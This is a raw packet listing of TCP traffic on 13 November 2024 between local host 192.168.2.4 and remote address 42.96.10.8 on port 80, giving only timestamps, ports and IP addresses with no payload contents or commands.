                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837194920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837274075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837897062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837923050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837937117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.837954998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838037968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838054895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838069916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838085890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838099957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838119984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838125944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838135004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838152885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838196039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838216066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838231087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838246107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838270903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838294029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838309050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838324070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838362932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838387012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838407993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838476896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838490009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838526011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838541031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838557005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838579893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838596106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838632107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838646889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838661909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838835955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838849068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838865995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838881969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838896990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838897943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838917017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838932991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838942051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.838954926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839000940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839016914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839031935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839083910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839083910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839111090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839126110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839152098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839167118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839181900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839205980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839224100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839229107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839238882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839292049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839301109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839385033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839406967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839423895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839441061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839442968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839482069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839497089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839510918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839548111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839548111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839570999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839589119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839603901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839620113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839637995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839653015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839667082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839673996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839718103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.839718103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883332014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883357048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883373022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883387089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883402109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883416891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883510113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883510113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.883510113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.925924063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.925940990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.925985098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.936321974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.936338902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.936355114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.936379910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953010082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953026056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953042030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953056097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953058958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953073025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953083038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953123093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953461885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953475952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953493118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953517914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953520060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953532934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953547001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953574896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953593969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953605890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953619003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953665972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953668118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953739882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953756094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953782082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953797102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953811884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953814030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953829050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953840971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953864098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953908920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953924894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.953959942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954094887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954138041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954157114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954164028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954188108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954196930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954205990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954256058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954303980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954319954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954334021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954364061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954392910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954420090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954433918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954437017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954473972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954476118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954489946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954525948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954540014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954547882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954581976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954617977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954632998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954648972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954667091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954680920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954680920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954718113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954721928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954737902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954771996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954776049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954787970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954808950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954850912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954879045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954894066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954912901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954933882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954933882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954974890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.954989910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955044031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955131054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955156088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955171108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955183029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955209017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955209017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955225945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.955274105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.997987986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998014927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998029947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998060942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998795033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998837948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998847961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998863935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998894930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998908997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998908997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998928070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998944044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998959064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:17.998986959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.039967060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.051860094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.051877975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.051891088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.051918983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068587065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068603039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068629026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068631887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068644047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068660021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068670988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.068702936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069117069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069200039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069214106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069230080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069245100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069258928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069276094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069295883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069315910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069403887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069447041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069499969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069523096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069539070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069552898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069569111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069576979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069586039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069593906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069610119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069633961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069641113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069649935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069665909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069672108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069693089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069705009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069705963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069721937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069745064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069813013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069863081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069868088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069884062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069911003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069922924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069926977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069942951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.069967031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070089102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070115089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070131063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070133924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070146084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070162058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070178986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070187092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070199966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070204020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070219994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070235968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070242882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070252895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070271969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070307970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070365906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070417881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070435047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070452929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070477009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070506096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070524931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070547104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070631981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070647001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070662975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070677042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070693970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070703030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070717096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070717096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070734024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070748091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070763111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070765018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.070771933 CET4973380192.168.2.442.96.10.8
